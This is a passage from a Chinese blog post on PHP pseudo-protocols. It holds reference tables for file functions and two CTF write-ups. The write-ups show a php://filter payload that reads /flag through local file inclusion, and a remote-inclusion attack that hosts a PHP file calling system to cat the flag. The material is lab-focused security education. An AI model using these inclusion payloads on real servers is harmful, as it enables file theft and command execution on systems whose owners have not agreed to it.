<td align="left">可选。规定如何打开&#x2F;写入文件。可能的值：<br /> FILE_USE_INCLUDE_PATH ：只提供了文件名，而没有提供完整的文件路径，将在PHP 的内置路径（include_path）搜索文件。<br />FILE_APPEND：如果设置了该标志，数据将被追加到文件末尾而不是覆盖文件内容。<br /> LOCK_EX：如果设置了该标志，在写入文件时会获取一个独占锁定（排它锁），以防止其他进程同时写入文件。这可以确保在多个进程同时写入文件时不会发生冲突。</td>
</tr>
<tr>
<td align="center">context</td>
<td align="left">可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。</td>
</tr>
</tbody></table>
<p>该函数访问文件时，遵循以下<strong>顺序</strong>：	</p>
<ol>
<li>如果设置了 <code>FILE_USE_INCLUDE_PATH</code> 标志，函数将首先检查 <code>filename</code> 参数的副本是否存在于 PHP 的内置路径（include_path）中。</li>
<li>函数将打开文件以进行写入操作。</li>
<li>如果设置了 <code>LOCK_EX</code> 标志，函数将对文件进行锁定（获取独占锁定），以确保在写入文件时不会发生冲突。</li>
<li>如果设置了 <code>FILE_APPEND</code> 标志，函数将将写入的数据追加到文件末尾。否则，函数将清除文件的内容并写入新的数据。</li>
<li>函数将写入数据到文件中。</li>
<li>函数将关闭文件并释放对文件的所有锁定。</li>
</ol>
<p>​	<br>​	</p>
<h2 id="fopen"><a href="#fopen" class="headerlink" title="fopen"></a>fopen</h2><p>fopen() 函数打开一个文件或 URL。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">fopen</span>(filename,mode,include_path,context)</span><br></pre></td></tr></table></figure>



<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left">filename</td>
<td align="left">必需。规定要打开的文件或 URL。</td>
</tr>
<tr>
<td align="left">mode</td>
<td align="left">必需。规定您请求到该文件&#x2F;流的访问类型。可能的值：”r” （只读方式打开，将文件指针指向文件头）”r+” （读写方式打开，将文件指针指向文件头）”w” （写入方式打开，清除文件内容，如果文件不存在则尝试创建之）”w+” （读写方式打开，清除文件内容，如果文件不存在则尝试创建之）”a” （写入方式打开，将文件指针指向文件末尾进行写入，如果文件不存在则尝试创建之）”a+” （读写方式打开，通过将文件指针指向文件末尾进行写入来保存文件内容）”x” （创建一个新的文件并以写入方式打开，如果文件已存在则返回 FALSE 和一个错误）”x+” （创建一个新的文件并以读写方式打开，如果文件已存在则返回 FALSE 和一个错误）</td>
</tr>
<tr>
<td align="left">include_path</td>
<td align="left">可选。如果您还想在 include_path（在 php.ini 中）中搜索文件的话，请设置该参数为 ‘1’。</td>
</tr>
<tr>
<td align="left">context</td>
<td align="left">可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。</td>
</tr>
</tbody></table>
<h1 id="文章引用"><a href="#文章引用" class="headerlink" title="文章引用"></a><strong>文章引用</strong></h1><ul>
<li><p>引用<strong>PHP 手册</strong>的内容<br>原文链接：<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/filters.php">PHP: 可用过滤器列表 - Manual</a></p>
</li>
<li><p>引用<strong>菜鸟教程</strong>的文章<br>原文链接：<a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-filesystem-fopen.html">https://www.runoob.com/php/func-filesystem-fopen.html</a></p>
</li>
<li><p>引用<strong>CSDN博主「Landasika」的原创文章</strong>，遵循CC 4.0 BY-SA版权协议<br>原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Jeff_12138/article/details/124815370">https://blog.csdn.net/Jeff_12138/article/details/124815370</a></p>
</li>
<li><p>引用<strong>CSDN博主「w0s1np」的原创文章</strong>，遵循CC 4.0 BY-SA版权协议</p>
<p>原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/woshilnp/article/details/117266628">https://blog.csdn.net/woshilnp/article/details/117266628</a></p>
</li>
</ul>
<h1 id="实战"><a href="#实战" class="headerlink" title="实战"></a><strong>实战</strong></h1><h2 id="No-1-土豆哥给的题目"><a href="#No-1-土豆哥给的题目" class="headerlink" title="No.1 土豆哥给的题目"></a><strong>No.1 土豆哥给的题目</strong></h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;easy lfi, but no flag~~&quot;</span>);</span><br><span class="line"><span class="variable">$cmd</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"><span class="comment">//flag in /flag</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$cmd</span>)) &#123;</span><br><span class="line">    <span class="keyword">print</span> (<span class="string">&quot;first one:&quot;</span> . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line">    <span class="variable">$cmd</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/flag/i&quot;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$cmd</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$cmd</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$cmd</span>)) &#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$cmd</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><strong>土豆哥：flag一般在根目录下</strong><del>(根本没听到,做了很多无用功，但偶然接触到了一句话木马)</del></p>
<p><strong>题解：</strong> </p>
<p>​	<code>$cmd = preg_replace(&quot;/flag/i&quot;, &#39;&#39;, $cmd);</code>这个正则表达式用于删除cmd中含有<code>flag</code>地方，第二个  <code>if (preg_match(&quot;/flag/i&quot;, $cmd))</code>用来判断是否含有flag这个词如果有则进行if下的内容。</p>
<p>​	按题目的含义我们可以构造出<code>flflagag</code>这个作为flag的替代</p>
<p>​	尝试直接进行<code>cmd=/flflagag</code>进行传参，发现并没有出现参数，判读估计进行了隐藏。使用php中的<strong>php:&#x2F;&#x2F;filter</strong>伪协议进行读取，使用<code>cmd=php://filter/read=convert.base64-encode/resource=/flag</code>尝试使用base64加密后读取。</p>
<p>​	页面出现经过base64加密后的内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PD9waHAKJEZMQUcgPSAiUk9JU3tkb3Vkb3VibGVibGVfY21jbWRkX3dpd2lubn0iOw==</span><br></pre></td></tr></table></figure>

<p>解密</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$FLAG</span> = <span class="string">&quot;ROIS&#123;doudoubleble_cmcmdd_wiwinn&#125;&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>发现flag是个变量无法直接通过include包含直接读出。</p>
<h2 id="No-2-CTFHub-技能树-RCE-文件包含-远程包含"><a href="#No-2-CTFHub-技能树-RCE-文件包含-远程包含" class="headerlink" title="No.2 CTFHub 技能树-RCE-文件包含-远程包含"></a><strong>No.2 CTFHub 技能树-RCE-文件包含-远程包含</strong></h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="title function_ invoke__">strpos</span>(<span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>], <span class="string">&quot;flag&quot;</span>)) &#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Hacker!!!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;hr&gt;</span><br><span class="line">i don<span class="string">&#x27;t have shell, how to get flag?&lt;br&gt;</span></span><br><span class="line"><span class="string">&lt;a href=&quot;phpinfo.php&quot;&gt;phpinfo&lt;/a&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>页面给了个小提示</strong></p>
<p><strong>phpinfo</strong></p>
<table>
<thead>
<tr>
<th>Directive</th>
<th>Local Value</th>
<th>Master Value</th>
</tr>
</thead>
<tbody><tr>
<td>allow_url_fopen</td>
<td>On</td>
<td>On</td>
</tr>
<tr>
<td>allow_url_include</td>
<td>On</td>
<td>On</td>
</tr>
</tbody></table>
<p><strong>题解：</strong></p>
<p>查看题目</p>
<p>​	<code> if (!strpos($_GET[&quot;file&quot;], &quot;flag&quot;))</code>发现题目要求必须使用非含flag的文件进行包含，则此时可以考虑进行远程包含。在服务器上建立一个txt文件，里面写入能进行打印出根目录下flag的代码，如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"> <span class="keyword">echo</span> <span class="title function_ invoke__">system</span>(cat /flag;); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>最后成功获取代码</p>
</article><div class="post-copyright"><div class="copyright-cc-box"><i class="anzhiyufont anzhiyu-icon-copyright"></i></div><div class="post-copyright__author_box"><a class="post-copyright__author_img" href="/" title="头像"><img class="post-copyright__author_img_back" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/avatar.jpg" title="头像" alt="头像"><img class="post-copyright__author_img_front" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/avatar.jpg" title="头像" alt="头像"></a><div class="post-copyright__author_name">Wells</div><div class="post-copyright__author_desc">Learning Web Security....</div></div><div class="post-copyright__post__info"><a class="post-copyright__original" title="该文章为原创文章，注意版权协议" href="https://we11s.github.io/posts/2344074049/">原创</a><a class="post-copyright-title"><span onclick="rm.copyPageUrl('https://we11s.github.io/posts/2344074049/')">PHP伪协议</span></a></div><div class="post-tools" id="post-tools"><div class="post-tools-left"><div class="rewardLeftButton"></div><div class="shareRight"><div class="share-link mobile"><div class="share-qrcode"><div class="share-button" title="使用手机访问这篇文章"><i class="anzhiyufont anzhiyu-icon-qrcode"></i></div><div class="share-main"><div class="share-main-all"><div id="qrcode" title="https://we11s.github.io/posts/2344074049/"></div><div class="reward-dec">使用手机访问这篇文章</div></div></div></div></div><div class="share-link weibo"><a class="share-button" target="_blank" href="https://service.weibo.com/share/share.php?title=PHP伪协议&amp;url=https://we11s.github.io/posts/2344074049/&amp;pic=/img/cover/OpINusYmEzLUYYoG.jpg" rel="external nofollow noreferrer noopener"><i class="anzhiyufont anzhiyu-icon-weibo"></i></a></div><script>function copyCurrentPageUrl() {
  var currentPageUrl = window.location.href;
  var input = document.createElement("input");
  input.setAttribute("value", currentPageUrl);
  document.body.appendChild(input);
  input.select();
  input.setSelectionRange(0, 99999);
  document.execCommand("copy");
  document.body.removeChild(input);
}</script><div class="share-link copyurl"><div class="share-button" id="post-share-url" title="复制链接" onclick="copyCurrentPageUrl()"><i class="anzhiyufont anzhiyu-icon-link"></i></div></div></div></div></div><div class="post-copyright__notice"><span class="post-copyright-info">本文遵循CC 4.0 BY-SA版权协议</span></div></div><div class="post-tools-right"><div class="tag_share"><div class="post-meta__box"><div class="post-meta__box__tag-list"><a class="post-meta__box__tags" href="/tags/CTF-Web/"><span class="tags-punctuation"> <i class="anzhiyufont anzhiyu-icon-tag"></i></span>CTF-Web<span class="tagsPageCount">14</span></a><a class="post-meta__box__tags" href="/tags/Web-PHP/"><span class="tags-punctuation"> <i class="anzhiyufont anzhiyu-icon-tag"></i></span>Web-PHP<span class="tagsPageCount">2</span></a></div></div></div><div class="post_share"><div class="social-share" data-image="/img/cover/XfqUOidClMslsgAT.jpg" data-sites="wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.cbd.int/butterfly-extsrc@1.1.3/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"/><script src="https://cdn.cbd.int/butterfly-extsrc@1.1.3/sharejs/dist/js/social-share.min.js" defer="defer"></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/3000552397/"><img class="prev-cover" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/zGnwevxpmIlRMRFI.jpg" onerror="onerror=null;src='/img/image404.png'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">SQL注入-基础</div></div></a></div><div class="next-post pull-right"><a href="/posts/4126800539/"><img class="next-cover" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/65a00ff013aaf.jpg" onerror="onerror=null;src='/img/image404.png'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Docker知识</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-content"><div class="author-info__sayhi" id="author-info__sayhi" onclick="anzhiyu.changeSayHelloText()"></div><div class="author-info-avatar"><img class="avatar-img" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/avatar.jpg" onerror="this.onerror=null;this.src='/img/firend404.gif'" alt="avatar"/><div class="author-status"><img class="g-status" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/c0f1977daac9a.png" alt="status"/></div></div><div class="author-info__description"><div style="line-height:1.38;margin:0.6rem 0;text-align:justify;color:rgba(255, 255, 255, 0.8);"><b style="color:#fff">WELLS BLOG</b></div><div style="line-height:1.38;margin:0.6rem 0;text-align:justify;color:rgba(255, 255, 255, 0.8);">这里存放着我学习<b style="color:#fff">CTF</b>和<b style="color:#fff">编程</b>的相关笔记</div><div style="line-height:1.38;margin:0.6rem 0;text-align:justify;color:rgba(255, 255, 255, 0.8);">希望这里的<b style="color:#fff">知识</b>和<b style="color:#fff">教程</b>能对你有所帮助。</div></div><div class="author-info__bottom-group"><a class="author-info__bottom-group-left" href="/"><h1 class="author-info__name">Wells</h1><div class="author-info__desc">Learning Web Security....</div></a><div class="card-info-social-icons is-center"><a class="social-icon faa-parent animated-hover" href="https://github.com/we11s" target="_blank" title="Github"><i class="anzhiyufont anzhiyu-icon-github"></i></a></div></div></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-bars"></i><span>文章目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%8D%8F%E8%AE%AE%E4%B8%8E%E5%B0%81%E8%A3%85%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.</span> <span class="toc-text">常见协议与封装协议</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#file"><span class="toc-number">1.1.</span> <span class="toc-text">file:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#http"><span class="toc-number">1.2.</span> <span class="toc-text">http:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php"><span class="toc-number">1.3.</span> <span class="toc-text">php:&#x2F;&#x2F;</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php-filter"><span class="toc-number">1.3.1.</span> <span class="toc-text">php:&#x2F;&#x2F;filter</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">过滤器</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.3.1.1.1.</span> <span class="toc-text">字符串过滤器</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%BD%AC%E6%8D%A2%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">1.3.1.1.2.</span> <span class="toc-text">转换过滤器</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">1.3.1.1.3.</span> <span class="toc-text">总结：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php-input"><span class="toc-number">1.3.2.</span> <span class="toc-text">php:&#x2F;&#x2F;input</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#zlib"><span class="toc-number">1.4.</span> <span class="toc-text">zlib:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phar"><span class="toc-number">1.5.</span> <span class="toc-text">phar:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#data"><span class="toc-number">1.6.</span> <span class="toc-text">data:&#x2F;&#x2F;</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-number">2.</span> <span class="toc-text">使用场景</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#include%E5%92%8Crequire%E5%87%BD%E6%95%B0"><span class="toc-number">2.1.</span> <span class="toc-text">include和require函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#include-once%E5%92%8Crequire-once%E5%87%BD%E6%95%B0"><span class="toc-number">2.2.</span> <span class="toc-text">include_once和require_once函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#highlight-file-%E5%92%8Cshow-source"><span class="toc-number">2.3.</span> <span class="toc-text">highlight_file()和show_source()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#readfile%E5%92%8Cfile-get-contents%E5%92%8Cfile"><span class="toc-number">2.4.</span> <span class="toc-text">readfile和file_get_contents和file</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#file-get-contents"><span class="toc-number">2.4.1.</span> <span class="toc-text">file_get_contents</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#readfile"><span class="toc-number">2.4.2.</span> <span class="toc-text">readfile</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file-1"><span class="toc-number">2.4.3.</span> <span class="toc-text">file</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#file-put-contents"><span class="toc-number">2.5.</span> <span class="toc-text">file_put_contents</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fopen"><span class="toc-number">2.6.</span> <span class="toc-text">fopen</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E7%AB%A0%E5%BC%95%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">文章引用</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%9E%E6%88%98"><span class="toc-number">4.</span> <span class="toc-text">实战</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#No-1-%E5%9C%9F%E8%B1%86%E5%93%A5%E7%BB%99%E7%9A%84%E9%A2%98%E7%9B%AE"><span class="toc-number">4.1.</span> <span class="toc-text">No.1 土豆哥给的题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#No-2-CTFHub-%E6%8A%80%E8%83%BD%E6%A0%91-RCE-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-%E8%BF%9C%E7%A8%8B%E5%8C%85%E5%90%AB"><span class="toc-number">4.2.</span> <span class="toc-text">No.2 CTFHub 技能树-RCE-文件包含-远程包含</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-history"></i><span>最近发布</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/1876369856/" title="2024KalmarCTF-WEB复盘"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/XfqUOidClMslsgAT.jpg" onerror="this.onerror=null;this.src='/img/image404.png'" alt="2024KalmarCTF-WEB复盘"/></a><div class="content"><a class="title" href="/posts/1876369856/" title="2024KalmarCTF-WEB复盘">2024KalmarCTF-WEB复盘</a><time datetime="2024-03-19T05:16:51.000Z" title="发表于 2024-03-19 13:16:51">2024-03-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/2304588875/" title="中间件漏洞"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/mIwxsCuQIaRdwhUD.jpg" onerror="this.onerror=null;this.src='/img/image404.png'" alt="中间件漏洞"/></a><div class="content"><a class="title" href="/posts/2304588875/" title="中间件漏洞">中间件漏洞</a><time datetime="2024-03-12T13:55:33.000Z" title="发表于 2024-03-12 21:55:33">2024-03-12</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/1041826382/" title="XSS-Lab题解"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/dgrXSVZdSzdtmBTV.jpg" onerror="this.onerror=null;this.src='/img/image404.png'" alt="XSS-Lab题解"/></a><div class="content"><a class="title" href="/posts/1041826382/" title="XSS-Lab题解">XSS-Lab题解</a><time datetime="2024-03-05T11:38:03.000Z" title="发表于 2024-03-05 19:38:03">2024-03-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/1946610579/" title="XSS绕过篇"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/tIBfDrPZuiasrroI.jpg" onerror="this.onerror=null;this.src='/img/image404.png'" alt="XSS绕过篇"/></a><div class="content"><a class="title" href="/posts/1946610579/" title="XSS绕过篇">XSS绕过篇</a><time datetime="2024-03-05T11:35:40.000Z" title="发表于 2024-03-05 19:35:40">2024-03-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/416548136/" title="SSTI漏洞-基础篇"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/cover/DbvpibmJqyTtdchK.jpg" onerror="this.onerror=null;this.src='/img/image404.png'" alt="SSTI漏洞-基础篇"/></a><div class="content"><a class="title" href="/posts/416548136/" title="SSTI漏洞-基础篇">SSTI漏洞-基础篇</a><time datetime="2024-03-05T11:26:19.000Z" title="发表于 2024-03-05 19:26:19">2024-03-05</time></div></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div id="footer_deal"><a class="deal_link" href="mailto:jwei_h@outlook.com" title="email"><i class="anzhiyufont anzhiyu-icon-envelope"></i></a><a class="deal_link" href="/atom.xml" title="RSS"><i class="anzhiyufont anzhiyu-icon-rss"></i></a><img class="footer_mini_logo" title="返回顶部" alt="返回顶部" onclick="anzhiyu.scrollToDest(0, 500)" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/avatar.jpg" size="50px"/><a class="deal_link" target="_blank" rel="noopener" href="https://github.com/we11s" title="Github"><i class="anzhiyufont anzhiyu-icon-github"></i></a><a class="deal_link" href="/copyright" title="CC"><i class="anzhiyufont anzhiyu-icon-copyright-line"></i></a></div><p id="ghbdages"><a class="github-badge" target="_blank" href="https://hexo.io/" style="margin-inline:5px" data-title="博客框架为Hexo" title="博客框架为Hexo"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/badge/frame-hexo.svg" alt="博客框架为Hexo"/></a><a class="github-badge" target="_blank" href="https://blog.anheyu.com/" style="margin-inline:5px" data-title="本站使用AnZhiYu主题" title="本站使用AnZhiYu主题"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/badge/theme.svg" alt="本站使用AnZhiYu主题"/></a><a class="github-badge" target="_blank" href="https://github.com/" style="margin-inline:5px" data-title="本站项目由Github托管" title="本站项目由Github托管"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/badge/source-github.svg" alt="本站项目由Github托管"/></a><a class="github-badge" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" style="margin-inline:5px" data-title="本站采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议进行许可" title="本站采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议进行许可"><img src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/badge/copyright.svg" alt="本站采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议进行许可"/></a></p></div><div id="footer-bar"><div class="footer-bar-links"><div class="footer-bar-left"><div id="footer-bar-tips"><div class="copyright">&copy;2023 - 2024 By <a class="footer-bar-link" href="/" title="Wells" target="_blank">Wells</a></div></div><div id="footer-type-tips"></div></div><div class="footer-bar-right"><a class="footer-bar-link" href="/null"></a></div></div></div></footer></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="sidebar-site-data site-data is-center"><a href="/archives/" title="archive"><div class="headline">文章</div><div class="length-num">22</div></a><a href="/tags/" title="tag"><div class="headline">标签</div><div class="length-num">10</div></a><a href="/categories/" title="category"><div class="headline">分类</div><div class="length-num">5</div></a></div><span class="sidebar-menu-item-title">功能</span><div class="sidebar-menu-item"><a class="darkmode_switchbutton menu-child" href="javascript:void(0);" title="显示模式"><i class="anzhiyufont anzhiyu-icon-circle-half-stroke"></i><span>显示模式</span></a></div><div class="back-menu-list-groups"><div class="back-menu-list-group"><div class="back-menu-list-title">项目</div><div class="back-menu-list"><a class="back-menu-item" href="https://we11s.github.io/" title="博客"><img class="back-menu-item-icon" src= "/img/loading.gif" onerror="this.onerror=null,this.src=&quot;/img/image404.png&quot;" data-lazy-src="/img/favicon.ico" alt="博客"/><span class="back-menu-item-text">博客</span></a></div></div></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 文章</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/archives/"><i class="anzhiyufont anzhiyu-icon-box-archive faa-tada" style="font-size: 0.9em;"></i><span> 归档</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/categories/"><i class="anzhiyufont anzhiyu-icon-shapes faa-tada" style="font-size: 0.9em;"></i><span> 分类</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/tags/"><i class="anzhiyufont anzhiyu-icon-tags faa-tada" style="font-size: 0.9em;"></i><span> 标签</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/summarize/"><i class="anzhiyufont anzhiyu-icon-list-ul faa-tada" style="font-size: 0.9em;"></i><span> 总结</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 神秘隧道</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/link/"><i class="anzhiyufont anzhiyu-icon-link faa-tada" style="font-size: 0.9em;"></i><span> 友链</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/album/"><i class="anzhiyufont anzhiyu-icon-images faa-tada" style="font-size: 0.9em;"></i><span> 相册集</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/download/"><i class="anzhiyufont anzhiyu-icon-download faa-tada" style="font-size: 0.9em;"></i><span> 下载</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 关于</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/about/"><i class="anzhiyufont anzhiyu-icon-paper-plane faa-tada" style="font-size: 0.9em;"></i><span> 关于我</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/announce/"><i class="anzhiyufont anzhiyu-icon-bullhorn faa-tada" style="font-size: 0.9em;"></i><span> 声明</span></a></li></ul></div></div><span class="sidebar-menu-item-title">标签</span><div class="card-tags"><div class="item-headline"></div><div class="card-tag-cloud"><a href="/tags/CTF-Web/" style="font-size: 0.88rem;">CTF-Web<sup>14</sup></a><a href="/tags/CTF-WriteUp/" style="font-size: 0.88rem;">CTF-WriteUp<sup>3</sup></a><a href="/tags/Tools/" style="font-size: 0.88rem;">Tools<sup>1</sup></a><a href="/tags/Web-Middleware/" style="font-size: 